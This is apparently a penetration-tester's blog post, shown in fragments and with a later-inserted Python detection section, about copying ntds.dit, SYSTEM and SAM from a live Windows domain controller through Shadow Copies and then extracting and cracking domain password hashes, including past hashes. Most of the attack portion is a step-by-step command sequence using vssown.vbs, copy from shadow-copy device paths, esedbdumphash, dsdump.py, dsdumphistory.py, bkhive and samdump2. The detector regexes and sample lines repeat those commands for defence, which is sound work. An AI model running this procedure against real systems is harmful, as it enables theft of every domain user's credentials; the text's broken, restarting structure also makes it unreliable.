
Safely Dumping Hashes from Live Domain Controllers

malware on Windows systems, but Mark mentions during the talk how one can access protected system files through Shadow Copies as well.

this meant something bigger. Something huge. Was it now possible to dump the NTDS.DIT and SYSTEM hive files from a LIVE domain controller for offline hash dumping? I quickly promoted one of my 2008 Servers to a DC, psexec'd a meterpreter shell to it and took a shot at the NTDS.DIT file with VSSOwn. The file copied out of the Shadow Copy without issue.

So it appears that Mark and I have uncovered some interesting stuff here. You can access anything that is supposed to be locked down and protected on a Windows system by accessing it through Shadow Copies. I can only imagine how we are going to begin seeing this used in the wild and I'm interested to see what others come up with.

But wait a sec. I still don't have hashes. All I have is the SYSTEM hive and the NTDS.DIT file. What can we do with these? Well, up until recently, nothing for free. No one had built a free, open source tool for parsing NTDS.DIT files and decrypting the

1. Create a new Shadow Copy.

<code>cscript vssown.vbs /start</code> (optional)
<code>cscript vssown.vbs /create</code>

2. Pull the following files from a shadow copy:

<code>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .</code>
<code>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .</code>
<code>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .</code>

3. Copy files to BT5R1.

2. Download tools from:

<a href="http://csababarta.com/downloads/ntds_dump_hash.zip">http://csababarta.com/downloads/ntds_dump_hash.zip</a>

3. Configure and Make the source code for libesedb from the extracted package.

<code>cd libesedb</code>
<code>chmod +x configure</code>
<code>./configure && make</code>

4. Use esedbdumphash to extract the datatable from ntds.dit.

<code>cd esedbtools</code>
<code>./esedbdumphash ../../ntds.dit</code>

5a. Use dsdump.py to dump the hashes from the datatable using the bootkey from the SYSTEM hive.

<code>cd ../../creddump/</code>
<code>python ./dsdump.py ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable</code>

5b. Use bkhive and samdump2 to dump the hashes from the SAM file using the bootkey from the SYSTEM hive.

<code>bkhive SYSTEM key.txt</code>
<code>samdump2 SAM key.txt</code>

6. Crack the hashes.
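From the defender's side, the two observable steps of this procedure on the domain controller are the snapshot creation and the read of ntds.dit, SYSTEM or SAM through a HarddiskVolumeShadowCopy device path. The following Python detection logic is an added example, not code from the original post; it assumes process command lines are available from a source such as Security event 4688 with command-line auditing or Sysmon event 1, and the sample command lines are constructed.

```python
import re
from typing import Optional

# Constructed sample process-creation command lines (hypothetical; not from the post).
SAMPLE_COMMANDLINES = [
    r"cscript vssown.vbs /create",
    r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\ntds\ntds.dit .",
    r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\system32\config\SYSTEM .",
    r"C:\Windows\System32\notepad.exe C:\Users\alice\notes.txt",
    r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Users\alice\report.docx .",
    r"vssadmin create shadow /for=C:",
]

# Low-fidelity signal: a snapshot is being created. Backup agents do this legitimately,
# so on its own it is worth correlating with the next signal rather than alerting on.
SHADOW_CREATE = re.compile(
    r"(vssown\.vbs\s+/(create|start)|vssadmin(\.exe)?\s+create\s+shadow)", re.I
)

# High-fidelity signal: a credential store is read through the snapshot device path,
# which is exactly how the protected files are copied in step 2 above.
SHADOW_SECRET_READ = re.compile(
    r"HarddiskVolumeShadowCopy\d+\\.*?(\\ntds\.dit|\\config\\(SYSTEM|SAM))(?=\s|$)", re.I
)


def classify(cmdline: str) -> Optional[str]:
    """Return a label for a suspicious command line, or None if it looks benign."""
    if SHADOW_SECRET_READ.search(cmdline):
        return "shadow_secret_read"
    if SHADOW_CREATE.search(cmdline):
        return "shadow_create"
    return None


def scan(cmdlines) -> list:
    """Label every command line; return (index, label, cmdline) for each hit."""
    return [(i, label, c) for i, c in enumerate(cmdlines) if (label := classify(c))]


if __name__ == "__main__":
    for i, label, c in scan(SAMPLE_COMMANDLINES):
        print(f"[{label}] line {i}: {c}")
```

A read of an unrelated file from the snapshot (the report.docx line) is deliberately not flagged, so the secret-read rule stays quiet for ordinary backup and restore activity.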

Beautiful right? But we're not done yet. Csaba also created a tool called dsdumphistory.py which dumps the PAST hashes of all the users as well. Now you can crack the historical passwords of users and identify patterns in their password history.

<code>python ./dsdumphistory.py ../system ../libesedb/esedbtools/ntds.dit.export/datatable</code>

So what exactly does this mean? No more dangerous LSASS injection to dump domain hashes and no more drive mounting to access locked and protected system files. This is just plain awesome! Huge props to Csaba Barta for the tools and kick ass white paper,
